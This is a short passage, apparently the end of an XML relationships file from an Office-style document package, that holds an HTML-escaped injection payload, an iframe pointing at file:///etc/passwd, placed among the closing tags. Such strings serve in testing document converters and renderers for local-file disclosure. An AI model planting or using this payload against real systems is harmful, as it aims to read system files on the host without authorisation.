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60add478343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&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;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2ad6be83d94ccf" /></Relationships>
</file>